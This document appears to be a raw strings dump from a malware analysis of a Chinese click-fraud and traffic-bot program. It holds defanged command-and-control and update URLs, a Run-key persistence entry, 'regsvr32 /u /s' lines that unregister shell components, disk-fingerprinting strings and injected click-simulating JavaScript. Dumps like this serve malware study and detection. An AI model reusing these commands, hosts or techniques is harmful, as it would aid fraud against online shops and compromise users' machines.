hXXp://amos.alicdn.com/getcid.aw?

hXXp://VVV.taobao.com/webww

hXXp://amos1.taobao.com

hXXp://sighttp.qq.com

hXXp://wpa.qq.com

%s\%s\%s

%dd

http:

.gov.cn

.org.cn

.net.cn

.com.cn

%d.%d.%d.%d

SOFTWARE\Microsoft\Windows\CurrentVersion\Run

%Y-%m-%d %H:%M:%S

%Y-%m-%d

{%s-%d-%d-%d-%d-%s-%s}

%s%s=

UseSQLAPI

hXXp://sss12.banjia.la/ServerAPI.ashx?ation=ip&key=eGhkZmVlZGJhY2sInste&num=100

%s|%s|%s

[%u - %u]

[%d][%X]

browser\browser.exe

regsvr32 /u /s shell32.dll

regsvr32 /u /s wshext.dll

regsvr32 /u /s wshom.ocx

regsvr32 /s jscript.dll

IP[%s]

SHOPID_%s

ITEMID_%s

TASKID_%d

OBJ:%s

[%d,%d]

%d%s%s

%s%s%s%s

%d%s%s%s%s

%d%s%d%s%d%s%d%s%s%s%d

%s%d%s%d

&mode=%d

?act=%s&hostid=%s&clntid=%s&ver=%d&isclnt=1&r=%s

m_sCommonAlertMsg

d:00 ~ d:00

m_sShopID

m_nHourLimit

m_sURL

hXXp://VVV.paipai.com/

paipai.com

hXXp://VVV.yhd.com/

yhd.com

hXXp://VVV.jd.com/

jd.com

hXXp://VVV.1688.com/

1688.com

hXXps://VVV.tmall.com/

tmall.com

hXXps://VVV.taobao.com/

taobao.com

m_sKeyword2

m_sKeyword1

%d%s%d%s%d%s%d%s%s%s%s

"%s" "%s"

1/%d~1/%d

%d-%d

hXXp://a.m.taobao.com/i%s.htm

gome.com.cn

product.suning.com/

suning.com

item.jd.com/

detail.1688.com/offer/

.html

sellerNick:'

data-nick="

%d|%d|%d

update.txt

1_0_%s.zip

%s_old

rnd=%d

1.1.3

hXXp://VVV.baidu.com/

VVV.meilishuo.com/share/item/

meilishuo.com

shop.mogujie.com/detail/

mogujie.com

product.dangdang.com/

dangdang.com

item.gome.com.cn/

item.yhd.com/item/

item.m.jd.com/

auction1.paipai.com/

item.wanggou.com/

m.1688.com/offer/

detail.china.alibaba.com/offer/

detail.yao.95095.com/item.htm?

yao.95095.com

detail.m.tmall.com/item.htm?

h5.m.taobao.com/awp/core/detail.htm?

ju.mmstat.com/?url=hXXps://item.taobao.com/item.htm?

ju.mmstat.com/?url=hXXp://item.taobao.com/item.htm?

detail.tmall.com/item.htm?

item.taobao.com/item.htm?

%s_%s_%d_%d

|^href^prefix^hXXp://auction1.paipai.com/

|^href^prefix^hXXp://c.express.paipai.com/exp_click.fcg?

|^href^prefix^hXXp://item.wanggou.com/^,^|^href^prefix^hXXp://auction1.paipai.com/

|^href^prefix^hXXp://s.paipai.com/^,^&^text^whole^

KeyWord

|^href^prefix^hXXp://click.p4p.1688.com/ci_bb?

|^href^prefix^hXXp://s.1688.com/selloffer/^,^&^text^whole^

keywords

|^href^prefix^hXXp://detail.tmall.com/item.htm?

|^href^prefix^hXXp://detail.tmall.com/item.htm?^,^&^href^include^id=<@

|^href^prefix^hXXp://list.tmall.com/search_product.htm?^,^&^text^whole^

hXXp://VVV.tmall.com/

|^href^prefix^hXXp://item.taobao.com/item.htm?^,^|^href^prefix^hXXp://detail.tmall.com/item.htm?^,^|^href^prefix^hXXp://ju.mmstat.com/?url=hXXp://item.taobao.com/item.htm?^,^|^text^whole^

|^href^prefix^hXXp://click.simba.taobao.com/cc_im?

|^href^prefix^hXXp://item.taobao.com/item.htm?^,^|^href^prefix^hXXp://detail.tmall.com/item.htm?^,^&^href^include^id=<@

|^href^prefix^hXXp://s.taobao.com/search?^,^&^text^whole^

hXXp://VVV.taobao.com/

|^href^prefix^hXXp://cn.bing.com/search?q=^,^&^text^whole^

hXXp://cn.bing.com/

|^href^prefix^hXXp://VVV.sogou.com/bill_cpc?

|^href^prefix^hXXp://VVV.soso.com/q?query=^,^&^text^whole^

hXXp://VVV.soso.com/

|^href^prefix^hXXp://e.tf.360.cn/search/eclk?

|^href^prefix^hXXp://VVV.so.com/s?^,^&^text^whole^

hXXp://VVV.so.com/

|^href^prefix^hXXp://VVV.baidu.com/baidu.php?url=

|^href^prefix^hXXp://VVV.baidu.com/link?url=

|^href^prefix^hXXp://VVV.baidu.com/s?wd=^,^&^text^whole^

"/""/""/""

version="5.1.0.0"

name="Microsoft.Windows.Common-Controls"

version="6.0.0.0"

publicKeyToken="6595b64144ccf1df"

d\StringFileInfo\xx\%s

msctls_hotkey32

HotKey1

STWorker.Document

1, 0, 0, 1

HMFlower.EXE

setmss.exe_3368:

.text

`.rdata

@.data

.rsrc

@.reloc

.uUF;

f;T$.uBf

FTPj

FTPR

tFHt:Ht.Ht"Hu`

t'SShl

9>t.hT

FTPS

j%XtL9E

QSShlP

tWSShW

tl9_ tgSSh

SSSSh

tAHt.HHt

u$SShe

@ SSHPWj

FtPW

SSh@B

FTCP

u.Ph<

<SShG

diu2.iu

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_s.cpp

CNotSupportedException

user32.dll

Afx:%p:%x:%p:%p:%p

Afx:%p:%x

commctrl_DragListMsg

CCmdTarget

comctl32.dll

comdlg32.dll

shell32.dll

mfcm100.dll

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewcore.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewform.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winfrm.cpp

CHttpConnection

CHttpFile

hXXp://

HTTP/1.0

CHotKeyCtrl

msctls_hotkey32

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl2.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filetxt.cpp

kernel32.dll

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp

RegOpenKeyTransactedA

Advapi32.dll

RegDeleteKeyTransactedA

CMDIChildWnd

CMDIFrameWnd

File%d

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

Software\Microsoft\Windows\CurrentVersion\Policies\Network

Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32

%s%s.dll

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp

lX-X-x-XX-XXXXXX

RegCreateKeyTransactedA

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp

Shell32.dll

%s:%x:%x:%x:%x

%s\shell\open\%s

%s\shell\print\%s

%s\shell\printto\%s

%s\DefaultIcon

%s\ShellNew

ddeexec

CMDITabProxyWnd

CMDIChildWndEx

%sMFCToolBar-%d%x

%sMFCToolBar-%d

%sMFCToolBarParameters

TOOLBAR_RESETKEYBAORD

&%d %s

RegDeleteKeyExA

lXXxXXXXXXXX

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olestrm.cpp

ole32.dll

{8895b1c6-b41f-4c1c-a562-0d564250836f}

Software\Microsoft\Windows\CurrentVersion\PreviewHandlers

%s\ShellEx\%s

MFCLink_UrlPrefix

MFCLink_Url

CMDIFrameWndEx

KeyboardManager

MSG_CHECKEMPTYMINIFRAME

%sDockingManager-%d

CMDIClientAreaWnd

%sMDIClientArea-%d

%sPane-%d%x

%sPane-%d

%sBasePane-%d%x

%sBasePane-%d

windows

ShowCmd

%c%d%c%s

Hex={X,X,X}

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleipfrm.cpp

%sMFCOutlookBar-%d%x

%sMFCOutlookBar-%d

%sDockablePaneAdapter-%d%x

%sDockablePaneAdapter-%d

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledrop2.cpp

CMFCToolBarsKeyboardPropertyPage

RGB(%d, %d, %d)

ENABLE_KEYS

KEYS_MENU

KEYS

%sMFCTasksPane-%d%x

%sMFCTasksPane-%d

Broken pipe

Inappropriate I/O control operation

Operation not permitted

operator

GetProcessWindowStation

d:\Program Files (x86)\Microsoft Visual Studio 10.0\VC\atlmfc\include\afxwin1.inl

%s (%s:%d)

inflate 1.2.7 Copyright 1995-2012 Mark Adler

deflate 1.2.7 Copyright 1995-2012 Jean-loup Gailly and Mark Adler

1.2.7

<4,$?7/'

(3-!0,1'8"5.*2$

%sX

hXXp://int.dpool.sina.com.cn/iplookup/iplookup.php?format=js

&ip=%s

hXXp://ip.taobao.com/service/getIpInfo.php?ip=%s

hXXp://apis.baidu.com/apistore/iplookupservice/iplookup?ip=%s

apikey: a97c11bc9aa6b786403a2fa84a1cdcf4

hXXp://VVV.ip.cn/

hXXp://ip.chinaz.com/getip.aspx

hXXp://1212.ip138.com/ic.asp

hXXp://ip-api.com/json

xxxxxx

\\.\PhysicalDrive%d

%d ReadPhysicalDriveInNTWithAdminRights ERROR ,CreateFileA(%s) returned INVALID_HANDLE_VALUE

%d ReadPhysicalDriveInNTWithAdminRights ERROR DeviceIoControl() %d, DFP_GET_VERSION) returned 0, error is %d

%d ReadPhysicalDriveInNTWithAdminRights ERROR No device found at iPosition %d (%d)

%d ReadPhysicalDriveInNTUsingSmart ERROR, CreateFileA(%s) returned INVALID_HANDLE_VALUE Error Code %d

%d ReadPhysicalDriveInNTUsingSmart ERROR DeviceIoControl(%d, SMART_GET_VERSION) returned 0, error is %d

%d ReadPhysicalDriveInNTWithZeroRights ERROR CreateFileA(%s) returned INVALID_HANDLE_VALUE

%s ReadPhysicalDriveInNTWithZeroRights ERROR DeviceIoControl(), IOCTL_DISK_GET_DRIVE_GEOMETRY_EX) returned 0

DeviceIOControl IOCTL_STORAGE_QUERY_PROPERTY error = %d

\\.\Scsi%d:

hXXp://VVV.baidu.com/

https

%s=%s

hXXps://

var el = document.getElementById('%s');

if (document.createEvent) {

var evt = document.createEvent('MouseEvents');

evt.initMouseEvent('%s', true, true, window,

el.dispatchEvent(evt);

} else if (el.fireEvent) {

el.fireEvent('on%s');

<a href="%s" target="%s">%s</a>

onkeydown

DSound.dll

winmm.dll

%s\%s

%s^%s

"%s" "%s" "wait=%d"

ttliuliang.com

ttsoft.cn

softfw.com

hXXp://%s.%s/

d:\Program Files (x86)\Microsoft Visual Studio 10.0\VC\atlmfc\include\afxwin2.inl

update.txt

1_0_%s.zip

%s_old

rnd=%d

[%d]%s

%s:%u

%s.log

%s_dddddd.log

{X-X-X-XX-XXXXXX}

---------------------------%s

Content-Type: multipart/form-data; boundary=%s

Content-Type: application/x-www-form-urlencoded

%s: %s

Content-Disposition: form-data; name="%s"

[%u]%s

desktop.ini

container.dat

index.dat

wininet.dll

hXXps://amos.im.alisoft.com/msg.aw?

hXXps://amos.alicdn.com/getcid.aw?

hXXps://VVV.taobao.com/webww

hXXps://amos1.taobao.com

hXXp://amos.im.alisoft.com/msg.aw?

hXXp://amos.alicdn.com/getcid.aw?

hXXp://VVV.taobao.com/webww

hXXp://amos1.taobao.com

hXXp://sighttp.qq.com

hXXp://wpa.qq.com

%dd

http:

.com.cn

.net.cn

.org.cn

.gov.cn

%d.%d.%d.%d

SOFTWARE\Microsoft\Windows\CurrentVersion\Run

%Y-%m-%d %H:%M:%S

%Y-%m-%d

item.taobao.com

detail.tmall.com

1007.13066.

%d/%d

taobao.com

login.taobao.com

VVV.taobao.com/

VVV.taobao.com

s.taobao.com/

s.taobao.com

history.replaceState({}, null, '%s');

{%s-%d-%d-%d-%d-%s-%s}

%s%s=

UseSQLAPI

VVV.meilishuo.com/share/item/

meilishuo.com

shop.mogujie.com/detail/

mogujie.com

product.dangdang.com/

dangdang.com

item.gome.com.cn/

gome.com.cn

product.suning.com/

suning.com

item.yhd.com/item/

yhd.com

item.m.jd.com/

item.jd.com/

jd.com

auction1.paipai.com/

item.wanggou.com/

paipai.com

m.1688.com/offer/

detail.china.alibaba.com/offer/

detail.1688.com/offer/

1688.com

detail.yao.95095.com/item.htm?

yao.95095.com

detail.m.tmall.com/item.htm?

tmall.com

h5.m.taobao.com/awp/core/detail.htm?

ju.mmstat.com/?url=hXXps://item.taobao.com/item.htm?

ju.mmstat.com/?url=hXXp://item.taobao.com/item.htm?

detail.tmall.com/item.htm?

item.taobao.com/item.htm?

hXXps://detail.1688.com/offer/534384293449.html

hXXp://s.m.taobao.com/h5?q=Wap金牌软件&search-bton=&event_submit_do_new_search_auction=1&_input_charset=utf-8&topSearch=1&atype=b&searchfrom=1&action=home:redirect_app_action&from=1&ttid=

Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A403 Safari/8536.25

hXXps://m.taobao.com/

hXXp://item.m.jd.com/product/10355154117.html

hXXp://m.jd.com/ware/search.action?sid=&keyword=运动护具&catelogyList=

Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1535.3 Safari/537.36

hXXps://VVV.taobao.com/

%s`;`&`

|^any^include^%s

%s_%s_%d_%d

item.taobao.com/auction/noitem.htm?

mdetail.tmall.com/mobile/notfound.htm

h5.m.taobao.com/detailplugin/expired.html?

detail.m.tmall.com/

tmall.com-

SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders

%s\Cookies

%s\Cache

ttworker%d

%s; PATH=/; DOMAIN=.%s

|^href^prefix^hXXp://auction1.paipai.com/

|^href^prefix^hXXp://c.express.paipai.com/exp_click.fcg?

|^href^prefix^hXXp://item.wanggou.com/^,^|^href^prefix^hXXp://auction1.paipai.com/

|^href^prefix^hXXp://s.paipai.com/^,^&^text^whole^

KeyWord

hXXp://VVV.paipai.com/

|^href^prefix^hXXp://click.p4p.1688.com/ci_bb?

|^href^prefix^hXXp://s.1688.com/selloffer/^,^&^text^whole^

keywords

hXXp://VVV.1688.com/

|^href^prefix^hXXp://detail.tmall.com/item.htm?

|^href^prefix^hXXp://detail.tmall.com/item.htm?^,^&^href^include^id=<@

|^href^prefix^hXXp://list.tmall.com/search_product.htm?^,^&^text^whole^

hXXp://VVV.tmall.com/

|^href^prefix^hXXp://item.taobao.com/item.htm?^,^|^href^prefix^hXXp://detail.tmall.com/item.htm?^,^|^href^prefix^hXXp://ju.mmstat.com/?url=hXXp://item.taobao.com/item.htm?^,^|^text^whole^

|^href^prefix^hXXp://click.simba.taobao.com/cc_im?

|^href^prefix^hXXp://item.taobao.com/item.htm?^,^|^href^prefix^hXXp://detail.tmall.com/item.htm?^,^&^href^include^id=<@

|^href^prefix^hXXp://s.taobao.com/search?^,^&^text^whole^

hXXp://VVV.taobao.com/

|^href^prefix^hXXp://cn.bing.com/search?q=^,^&^text^whole^

hXXp://cn.bing.com/

|^href^prefix^hXXp://VVV.sogou.com/bill_cpc?

|^href^prefix^hXXp://VVV.soso.com/q?query=^,^&^text^whole^

hXXp://VVV.soso.com/

|^href^prefix^hXXp://e.tf.360.cn/search/eclk?

|^href^prefix^hXXp://VVV.so.com/s?^,^&^text^whole^

hXXp://VVV.so.com/

|^href^prefix^hXXp://VVV.baidu.com/baidu.php?url=

|^href^prefix^hXXp://VVV.baidu.com/link?url=

|^href^prefix^hXXp://VVV.baidu.com/s?wd=^,^&^text^whole^

SHELL32.DLL

ZwQueryValueKey

NTDLL.DLL

WININET.DLL

KERNEL32.DLL

WININET.dll

SHELL32.dll

KERNEL32.dll

NTDLL.dll

%s\vest%d

%s\History

hXXp://sss12.banjia.la/ServerAPI.ashx?ation=ip&key=eGhkZmVlZGJhY2sInste&num=100

%s|%s|%s

[%d][%X]

[%u - %u]

ttbrowser.exe

TASKID_%d

ITEMID_%s

SHOPID_%s

IP[%s]

regsvr32 /s jscript.dll

regsvr32 /u /s wshom.ocx

regsvr32 /u /s wshext.dll

regsvr32 /u /s shell32.dll

OBJ:%s

[%d,%d]

%d%s%s%s%s

%d%s%d%s%d%s%d%s%s%s%d

%d%s%s

%s%s%s%s

%s%d%s%d

login2[MAN].m.[TTSOFT]

login1[MAN].m.[TTSOFT]

login[MAN].m.[TTSOFT]

?act=%s&hostid=%s&clntid=%s&ver=%d&isclnt=1&r=%s

&mode=%d

m_sCommonAlertMsg

d:00 ~ d:00

m_sURL

m_nHourLimit

m_sShopID

hXXp://VVV.yhd.com/

hXXp://VVV.jd.com/

hXXps://VVV.tmall.com/

m_sKeyword1

m_sKeyword2

"%s" "%s"

%d%s%d%s%d%s%d%s%s%s%s

1/%d~1/%d

%d-%d

hXXp://a.m.taobao.com/i%s.htm

data-nick="

sellerNick:'

.html

%d|%d|%d

ttflow.ini

m_dwHotKey

%s%d/update/

update_stworker.txt

1.9.67

- V%s

hXXp://user.ttliuliang.com

hXXp://user.ttliuliang.com/html/notice/175.html

hXXp://user.ttliuliang.com/clnt/tips_flownews.htm

register.htm

SEOWorkApp_HOTKEY

STWorker.AppID.NoVersion

F:\Projects_New\ClickPro\proj\stuike\bin\Release\

GetCPInfo

WinExec

GetWindowsDirectoryA

PeekNamedPipe

GetProcessHeap

GetAsyncKeyState

GetKeyState

EnumChildWindows

RegisterHotKey

UnregisterHotKey

UnhookWindowsHookEx

SetWindowsHookExA

GetKeyNameTextA

MapVirtualKeyA

CreateDialogIndirectParamA

GetKeyboardLayout

GetKeyboardState

MapVirtualKeyExA

USER32.dll

GetViewportExtEx

SetViewportOrgEx

OffsetViewportOrgEx

SetViewportExtEx

ScaleViewportExtEx

GetViewportOrgEx

GDI32.dll

MSIMG32.dll

COMDLG32.dll

WINSPOOL.DRV

RegOpenKeyExA

RegCreateKeyExA

RegCloseKey

RegCreateKeyA

RegOpenKeyA

RegOpenKeyExW

RegDeleteKeyA

RegEnumKeyA

RegEnumKeyExA

ADVAPI32.dll

ShellExecuteA

COMCTL32.dll

UrlUnescapeA

SHLWAPI.dll

OLEAUT32.dll

oledlg.dll

URLDownloadToFileA

UrlMkSetSessionOption

urlmon.dll

GdiplusShutdown

gdiplus.dll

NETAPI32.dll

DeleteUrlCacheEntry

HttpQueryInfoA

FindFirstUrlCacheEntryA

FindNextUrlCacheEntryA

FindCloseUrlCache

InternetCrackUrlA

InternetCanonicalizeUrlA

HttpSendRequestA

HttpOpenRequestA

WINMM.dll

imagehlp.dll

VERSION.dll

OLEACC.dll

IMM32.dll

.PAVCMemoryException@@

.PAVCSimpleException@@

.PAVCObject@@

.PAVCNotSupportedException@@

.PAVCInvalidArgException@@

.?AVCNotSupportedException@@

.PAVCOleException@@

.?AVCTestCmdUI@@

.?AVCCmdUI@@

.PAVCUserException@@

.PAVCResourceException@@

.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@

.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@

.?AVCHttpConnection@@

.?AVCHttpFile@@

.PAVCArchiveException@@

.?AVCStatusCmdUI@@

.PAVCOleDispatchException@@

.PAVCFileException@@

.?AVCMDITabProxyWnd@@

.?AVCMDIChildWndEx@@

.?AVCMFCToolBarCmdUI@@

.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDV12@PBD@@

.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDPAVCDocument@@PAV3@@@

.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBD_N_N@@

.?AV?$CMap@PAVCDocument@@PAV1@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBD@@

.?AVCMDIFrameWndEx@@

.?AV?$CList@PAVCMDIChildWndEx@@PAV1@@@

.?AVCMDIClientAreaWnd@@

.?AVCMFCCmdUsageCount@@

.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDPAVCObList@@PAV3@@@

.?AVCMFCAcceleratorKey@@

.?AVCMFCColorBarCmdUI@@

.?AV?$CMap@KKV?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBD@@

.?AVCMFCRibbonCmdUI@@

.?AVCMFCToolBarsKeyboardPropertyPage@@

.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDHH@@

.?AVCMFCRibbonKeyTip@@

.?AVCMFCTasksPaneToolBarCmdUI@@

.?AVCMFCAcceleratorKeyAssignCtrl@@

zcÁ

.?AVCCmdTarget@@

.PAVCException@@

.?AVXHttpRequest@@

.?AVXHttpRequestEx@@

.?AVXMmiHttp@@

.?AVCURLLinkButton@@

.?AVXHttpHeadData@@

.PAVCInternetException@@

.?AUIHttpSecurity@@

.?AVXHttpSecurity@CCustomControlSite@@

.?AVCMDIChildWnd@@

.?AVCHotKeyCtrl@@

.?AVCMDIFrameWnd@@

C:\Windows\Fonts\win\setmss.exe

.BEE;"

<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity processorArchitecture="x86" version="5.1.0.0" type="win32" name="OceanSoftApplication"></assemblyIdentity><description>OceanSoft Application</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" publicKeyToken="6595b64144ccf1df" language="*" processorArchitecture="x86"></assemblyIdentity></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><application xmlns="urn:schemas-microsoft-com:asm.v3"><windowsSettings><ms_windowsSettings:dpiAware xmlns:ms_windowsSettings="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings" xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</ms_windowsSettings:dpiAware></windowsSettings></application></assembly>

7#8*8/888

>$?(?,?0?

3#3'3 373

7/878`8[9

11p1

3!545[5{5

=)>4>_>~>

2"2&2*2<2

=@> ?]?~?

7'747}7&8:8

3L4

11?1^1

5]5S5a5t5}5

>#?,?5?^?

;!;(;^;|;

0&0,02080

8!8%8)8-848

88K8S8\8g8v8

0 0$0(0,0004080

1 1$181<1

2 2$2(2,2024282<2@2

0004080<0

? ?$?(?,?0?4?8?<?@?

9 9$9(90989

=,=8=@=`=

8 8(808<8`8

9 9@9`9|9

= =<=@=`=

>(>0>\>|>

0 0<0\0|0

(1@1\1|1

accKeyboardShortcut

hhctrl.ocx

dwmapi.dll

UxTheme.dll

USER32.DLL

RICHED20.DLL

ekernel32.dll

mscoree.dll

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

\StringFileInfo\xx\%s

HotKey1

STWorker.Document

(*.*)

1.0.0.1

TTWorker.exe

setmss.exe_3368_rwx_00AAB000_00001000:

diu2.iu

setmss.exe_3368_rwx_6F1F1000_00001000:

OLEUI_MSG_BROWSE_OFN

OLEUI_MSG_ADDCONTROL

OLEUI_MSG_CHANGESOURCE

OLEUI_MSG_CONVERT

OLEUI_MSG_CLOSEBUSYDIALOG

OLEUI_MSG_CHANGEICON

OLEUI_MSG_BROWSE

OLEUI_MSG_ENDDIALOG

OLEUI_MSG_HELP

wbmoney.exe_3752:

.text

`.rdata

@.data

.rsrc

(SSSSh@

L$,SSh

?456789:;<=

!"#$%&'()* ,-./0123

inflate 1.1.3 Copyright 1995-1998 Mark Adler

MFC42.DLL

MSVCRT.dll

_acmdln

WinExec

DisconnectNamedPipe

GetProcessHeap

ConnectNamedPipe

CreateNamedPipeA

KERNEL32.dll

RegisterHotKey

UnregisterHotKey

GetProcessWindowStation

USER32.dll

GDI32.dll

RegCreateKeyA

RegOpenKeyA

ADVAPI32.dll

ShellExecuteA

SHELL32.dll

MSVCP60.dll

GdiplusShutdown

gdiplus.dll

SHLWAPI.dll

HttpEndRequestA

HttpQueryInfoA

HttpSendRequestA

HttpOpenRequestA

HttpAddRequestHeadersA

InternetOpenUrlA

WININET.dll

WS2_32.dll

VERSION.dll

GetWindowsDirectoryA

RegCloseKey

RegOpenKeyExA

COMCTL32.dll

ole32.dll

OLEAUT32.dll

wbmoney.exe

?classCWebBrowser2@CWebBrowser2@@2UCRuntimeClass@@B

?messageMap@CAboutDlg@@1UAFX_MSGMAP@@B

?messageMap@CAgentCustomizeDlg@@1UAFX_MSGMAP@@B

?messageMap@CGetDlg@@1UAFX_MSGMAP@@B

?messageMap@CHideWndDlg@@1UAFX_MSGMAP@@B

?messageMap@CLiuliangzbApp@@1UAFX_MSGMAP@@B

?messageMap@CLiuliangzbDlg@@1UAFX_MSGMAP@@B

?messageMap@CRegisterDlg@@1UAFX_MSGMAP@@B

?messageMap@CSettingDlg@@1UAFX_MSGMAP@@B

VVV.1688.com

{"userinput":"%s","exec":"getuserlogin"}

V1.4.8--

wbliuliang%d

parems=%s

VVV.taobao.com

TbViewer.exe

wbmoney.exe.ini

%d : %d, %d, %d, %s

task_url

o_url

dwError: %d

browser\GGtbviewerDebug.exe

%s%s %s

browser\GGtbviewer.exe

keyword

dwMemrSize : %d, dwMemorySize : %d ,S:%d

QQ.exe

.tmall.com

.taobao.com

hXXp://VVV.ip138.com

Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; EmbeddedWB 14.52 from: hXXp://VVV.bsalsa.com/ EmbeddedWB 14.52; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; Alexa Toolbar)

192.168.

hXXp://reg.4345.cc/?r=%d

hXXp://reg.2466.cc/?r=%d

hXXp://reg.3299.cc/?r=%d

u.ini

hXXp://x1.tojingjia.com/

hXXp://x1.9935.org/

hXXp://x1.wangbaoma.com/

hXXp://x1.huanips.com/

hXXp://x1.qqshuoyu.com/

hXXp://x1.2466.cc/

/ClientAPI/StatisticsUserAPI.aspx

%Y-%m-%d %H:%M:%S

HotKey

hXXp://down.9935.org/gj/ver.txt

hXXp://6688.qqshuoyu.com

hXXp://6688.huanips.com

hXXp://6688.wangbaoma.com

hXXp://6688.9935.org

hXXp://6688.tojingjia.com

hXXp://6688.6299.cc

hXXp://down.9935.org/gj/

<ureport.txt>

Email: < baweicha@foxmail.com >

{0AD5643C-D660-48A1-B7A1-FAAA5F0D91CD}

1.4.8

ureport.txt

/ClientAPI/flowtaskAPIV4.aspx

/ClientAPI/flowtaskAPIV2.aspx

/ClientAPI/flowtaskAPIV1.aspx

Launch.exe

{FBA9BEBC-C178-44BB-96AD-C2D81AC12882}

%s %s

update.zip

updatezb.exe

Config.ini

%s,%s,%s

c:\windows\

{"userinput":"%s","exec":"getuserlogin","ggtbviewerv":"%s","updatev":"%s","tbviewerv":"%s","version":"%s","src":"%s","ip":"%s"}

{"userid":"%s","username":"%s","exec":"getuserlogin"}

hXXp://VVV.4345.cc/rj/flowtips.html

hXXp://VVV.4345.cc/

hXXp://wpa.b.qq.com/cgi/wpa.php?ln=2&uin=800039157

%d%d%d%d

loginerror

loginstatus

1.4.0.8

hXXp://u.6299.cc

{"userno":"%s","src":"%s","ip":"%s","exec":"outlogin"}

explorer.exe

kernel32.dll

@qq.com

CWebBrowser2

\\.\pipe\%s

%s:%s

Unable to GetProcessWindowStation:

right-curly-bracket

left-curly-bracket

0123456789

::WriteFile failed ("%s").

::GetFileSize failed ("%s").

OpenFile (::CreateFile) failed ("%s").

::HttpEndRequest failed.

::HttpSendRequestEx failed.

::HttpSendRequest failed.

::HttpAddRequestHeaders failed.

::HttpOpenRequest failed.

::HttpQueryInfo failed.

The file (%s) aleady exists.

The encoded URL is not valid.

The port number is not valid.

The requested URL is not a valid URL.

HTTP/1.1

Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36

hXXps://

hXXp://

error:%d

Mdd

Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko

Content-Type: application/x-www-form-urlencoded

Error:%d

Host: %s

HTTP/1.0

Software\Microsoft\Windows\CurrentVersion\Run

\\.\PhysicalDrive0

iphlpapi.dll

Error %d

xxxx

Incorrect key length

report

%s%.8x %.8x %.8x %.8x

%sCS=%.4x

%sEDI=%.8x

%sES=%.4x

%sEDX=%.8x

%sFS=%.4x

%sESI=%.8x

%sDS=%.4x

%sECX=%.8x

%sEBP=%.8x

%sESP=%.8x

%sSS=%.4x

%sEBX=%.8x

%sEFLGS=%.8x

%sEIP=%.8x

%sCS=%.4x

%sEAX=%.8x

\StringFileInfo\xx\FileVersion

%s%.8x

\winhlp32.exe

UxTheme.dll

code %d bits %d->%d

gen_codes: max_code %d

bl code -

opt %lu(%lu) stat %lu(%lu) stored %lu lit %u dist %u

last_lit %u, last_dist %u, in %ld, out ~%ld(%ld%%)

1.1.3

%s%s%s

"iTXtXML:com.adobe.xmp

